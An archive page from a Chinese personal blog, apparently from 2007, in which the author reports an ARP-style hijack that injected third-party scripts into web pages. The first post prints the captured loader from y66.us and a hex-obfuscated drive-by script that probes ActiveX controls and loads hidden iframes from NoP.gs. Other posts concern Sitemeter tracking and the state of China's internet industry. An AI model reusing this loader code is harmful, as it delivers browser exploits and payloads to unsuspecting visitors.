Archive for the '互联网' Category
因为遇到firefox无法下载文件无法管理的问题,重新下载了2.0.0.4英文版的安装了下,结果又遭遇劫持事件。
安装以后发现打开含有google adsense的页面全部还有第三方的JS,来自于y66.us。
-
<script src=http://y66.us/2.js></script>
打开这个JS,是一段框架代码
-
document.writeln("<script src=\"http:\/\/y66.us\/oK\/Vernum.js\"><\/script>");
-
document.writeln("</script><script>");
-
document.writeln("function Start(){");
-
document.writeln("var Then = new Date() ");
-
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
-
document.writeln("var cookieString = new String(document.cookie)");
-
document.writeln("var cookieHeader = \"Cookie1=\" ");
-
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
-
document.writeln("if (beginPosition != -1){ ");
-
document.writeln("} else ");
-
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
-
document.writeln("document.writeln(\"<iframe height=0 width=0 src=\\\"http:\\\/\\\/y66.us\\\/oK\\\/oKT.asp\\\"><\\\/iframe>\");");
-
document.writeln("document.writeln(\"</iframe><iframe height=0 width=0 src=\\\"http:\\\/\\\/y66.us\\\/oK\\\/oKT.asp\\\"><\\\/iframe>\");");
-
document.writeln("}");
-
document.writeln("}");
-
document.writeln("Start();");
-
document.writeln("<\/script>")
感觉这段代码不会对我的电脑带来任何益处,询问了下,不是google adsense的问题,那就是我的浏览器出了问题。立即把firefox的所有缓存都清除,并卸载了firefox,整机杀了下毒,并没发现什么。重新下载安装中文版的,一切又恢复了正常。 ![]()
比较奇怪,一直比较谨慎,安装了no script,很少会自动运行不正常网站的代码,也不知道是在哪中招了。
暂时可以使用Anti ARP Sniffer预防这一问题。
2007.10.18 Update: 今天又碰到类似的劫持
js来自
-
<script src=http://rb.vg/1.js></script>
JS代码为
-
var vDA1 = new window["\x44\x61\x74\x65"]()
-
vDA1["\x73\x65\x74\x54\x69\x6d\x65"](vDA1["\x67\x65\x74\x54\x69\x6d\x65"]() + 24*60*60*1000)
-
var eOTo$2 = new window["\x53\x74\x72\x69\x6e\x67"](window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"])
-
var eZT3 = "\x43\x6f\x6f\x6b\x69\x65\x31\x3d"
-
var VMliYvVKu4 = eOTo$2["\x69\x6e\x64\x65\x78\x4f\x66"](eZT3)
-
if (VMliYvVKu4 == -1)
-
{
-
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"] = "\x43\x6f\x6f\x6b\x69\x65\x31\x3d\x50\x4f\x50\x57\x49\x4e\x44\x4f\x53\x3b\x65\x78\x70\x69\x72\x65\x73\x3d"+ vDA1["\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67"]()
-
try{if(new ActiveXObject("\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x58\x4d\x4c\x48\x54\x54\x50"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\/\/\x4e\x6f\x50\x2e\x67\x73\/\x73\x33\x36\x38\/\x4e\x65\x77\x4a\x73\x31\x2e\x6a\x73\x22\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e');}catch(e){} // ms06014
-
try{if(new ActiveXObject("\x44\x50\x43\x6c\x69\x65\x6e\x74\x2e\x56\x6f\x64"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x74\x33\x36\x38\x6f\x6b\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // XL
-
try{if(new ActiveXObject("\x4d\x50\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x47\x6f\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // BF
-
try{if(new ActiveXObject("\x50\x4f\x57\x45\x52\x50\x4c\x41\x59\x45\x52\x2e\x50\x6f\x77\x65\x72\x50\x6c\x61\x79\x65\x72\x43\x74\x72\x6c\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x54\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // PPS
-
try{if(new ActiveXObject("\x50\x64\x67\x32"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x72\x65\x61\x64\x65\x72\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // CX
-
try{if(new ActiveXObject("\x47\x4c\x43\x48\x41\x54\x2e\x47\x4c\x43\x68\x61\x74\x43\x74\x72\x6c\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x4c\x69\x6e\x6b\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // LZ
-
try{if(new ActiveXObject("\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x50\x69\x63\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // Baidu
-
}
疑为局域网ARP病毒。
以前一直使用Sitemeter的统计服务,直到前段时间,发现安装sitemeter统计的网站会多一条来自specificclick.net的js。感觉不太舒服就移除了。
最近打开其首页的时候,发现本来PR6的sitemeter变成了0,打开google,site和link了一下,没有任何结果,看似被google屏蔽了,搜索了下,是与安插间谍软件有关。
据说,安插这个JS对使用者本身不会造成破坏,但会记录访客的信息。不过被加入第三方的监查软件始终不那么让人愉快,如果您在使用sitemeter的服务,不妨查看下是否有第三方的JS,在firefox浏览器下安装No Script插件,就可以查看到是否有多于的JS。
中国的互联网与国际互联网在时代上相差无几,但事实上,中国互联网所创造的价值相比国际互联网行业相差很多。大多数条件都是相等,我们拥有相同的设备,相同的信息量,所有的新型技术和新型产业也与国际上相差不多,几乎差不多时候都产生了,但为何所创造的价值或者说成功的事例远没有国际上的多呢。我唯一能想到的原因就是人员素质差异了。
没有明确的规则,从业人员自律性差,往往是把社会上的坑蒙拐骗都搬到互联网上。在没有规则,或者规则的实施力度比较差的时候,人情、后台、交情往往也在互联网行业起着重要的作用。常常出现的情况是大多数的互联网项目都像卖人情一样,出售给自己熟悉的人员,导致的后果往往也是豆腐渣工程一堆,看看各个政府网站,或者内部OA系统,粗制滥造的占大多数。
就个人经验而言,互联网企业很大多数企业也有缺乏有效的管理,各种弊病无法妥善解决,经营不善存在于大多数。可能只是不太了解,往往大的互联网企业的弊病更多,企业冗余的成分太多,没有有效的管理,最终的结果就只能想股市一样崩盘。
在互联网上中国唯一引以为傲的可能要属我们的GFW了,可惜技术还是境外的服务器上提供的。个体素质的差异往往也导致中国互联网企业无法提升重要原因,专业性人才缺乏,大家都是一般的技术,一般的管理,所以出来的企业也就是一般的。


